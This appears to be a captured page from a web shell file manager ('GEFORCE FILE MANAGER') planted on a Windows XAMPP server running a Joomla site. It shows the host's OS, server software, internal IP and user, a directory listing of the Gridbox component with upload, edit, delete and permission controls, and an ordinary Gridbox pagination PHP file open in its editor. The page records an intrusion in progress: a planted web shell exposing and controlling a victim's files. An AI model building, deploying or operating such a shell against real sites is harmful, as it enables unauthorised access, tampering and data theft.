[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
views
/
layout
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 apps
SET
[ DEL ]
📁 css
SET
[ DEL ]
📁 import
SET
[ DEL ]
📁 patterns
SET
[ DEL ]
📁 system
SET
[ DEL ]
📄 add-to-cart.php
4,723 B
SET
[ EDIT ]
|
[ DEL ]
📄 baforms.php
2,352 B
SET
[ EDIT ]
|
[ DEL ]
📄 blog-posts-pagination.php
2,441 B
SET
[ EDIT ]
|
[ DEL ]
📄 blog-posts.php
668 B
SET
[ EDIT ]
|
[ DEL ]
📄 button.php
2,188 B
SET
[ EDIT ]
|
[ DEL ]
📄 carousel.php
2,760 B
SET
[ EDIT ]
|
[ DEL ]
📄 comments-box.php
4,648 B
SET
[ EDIT ]
|
[ DEL ]
📄 facebook-comments.php
2,442 B
SET
[ EDIT ]
|
[ DEL ]
📄 feature-box.php
2,748 B
SET
[ EDIT ]
|
[ DEL ]
📄 field-button.php
2,213 B
SET
[ EDIT ]
|
[ DEL ]
📄 field-slideshow.php
3,186 B
SET
[ EDIT ]
|
[ DEL ]
📄 flipbox.php
4,638 B
SET
[ EDIT ]
|
[ DEL ]
📄 hypercomments.php
2,410 B
SET
[ EDIT ]
|
[ DEL ]
📄 logo.php
2,219 B
SET
[ EDIT ]
|
[ DEL ]
📄 one-page-menu.php
3,301 B
SET
[ EDIT ]
|
[ DEL ]
📄 overlay-section.php
5,315 B
SET
[ EDIT ]
|
[ DEL ]
📄 post-tags.php
2,131 B
SET
[ EDIT ]
|
[ DEL ]
📄 reading-progress-bar.php
2,416 B
SET
[ EDIT ]
|
[ DEL ]
📄 recent-posts-slider.php
2,669 B
SET
[ EDIT ]
|
[ DEL ]
📄 recent-posts.php
2,214 B
SET
[ EDIT ]
|
[ DEL ]
📄 search-result-pagination.php
2,350 B
SET
[ EDIT ]
|
[ DEL ]
📄 social-icons.php
2,411 B
SET
[ EDIT ]
|
[ DEL ]
📄 star-ratings.php
3,296 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags.php
2,148 B
SET
[ EDIT ]
|
[ DEL ]
📄 text.php
2,353 B
SET
[ EDIT ]
|
[ DEL ]
📄 vk-comments.php
2,400 B
SET
[ EDIT ]
|
[ DEL ]
📄 weather-today.php
1,127 B
SET
[ EDIT ]
|
[ DEL ]
📄 weather.php
6,768 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: blog-posts-pagination.php
<?php /** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; ob_start(); $prev = $active == 0 ? 1 : $active; $next = $active == $pages - 1 ? $pages : $active + 2; ?> <div class="ba-blog-posts-pagination"> <?php if ($type != '') { $style = ($type == 'infinity' || $active == $pages - 1 || ($type == 'load-more-infinity' && $active > 0)) ? 'style="display:none !important"' : ''; ?> <span class="<?php echo $active == $pages - 1 ? 'disabled' : ''; ?>" <?php echo $style; ?>> <a href="<?php echo JRoute::_($url.'&page='.$next); ?>" data-page="<?php echo $next; ?>"> <?php echo JText::_('LOAD_MORE'); ?> </a> </span> <?php } else { ?> <span class="<?php echo $active == 0 ? 'disabled' : ''; ?>"> <a href="<?php echo JRoute::_($url.'&page=1'); ?>" <?php echo $active == 0 ? 'onclick="return false;"' : ''; ?>> <i class="ba-icons ba-icon-skip-previous"></i> </a> </span> <span class="<?php echo $active == 0 ? 'disabled' : ''; ?>"> <a href="<?php echo JRoute::_($url.'&page='.$prev); ?>" <?php echo $active == 0 ? 'onclick="return false;"' : ''; ?>> <i class="ba-icons ba-icon-fast-rewind"></i> </a> </span> <?php for ($i = $start; $i < $max; $i++) { ?> <span class="<?php echo $i == $active ? 'active' : ''; ?>"> <a href="<?php echo JRoute::_($url.'&page='.($i + 1)); ?>" <?php echo $i == $active ? 'onclick="return false;"' : ''; ?>> <?php echo ($i + 1); ?> </a> </span> <?php } ?> <span class="<?php echo $active == $pages - 1 ? 'disabled' : ''; ?>"> <a href="<?php echo JRoute::_($url.'&page='.$next); ?>" <?php echo $active == $pages - 1 ? 'onclick="return false;"' : ''; ?>> <i class="ba-icons ba-icon-fast-forward"></i> </a> </span> <span class="<?php echo $active == $pages - 1 ? 'disabled' : ''; ?>"> <a href="<?php echo JRoute::_($url.'&page='.$pages); ?>" <?php echo $active == $pages - 1 ? 'onclick="return false;"' : ''; ?>> <i class="ba-icons ba-icon-skip-next"></i> </a> </span> <?php } ?> </div> <?php $out = ob_get_contents(); ob_end_clean();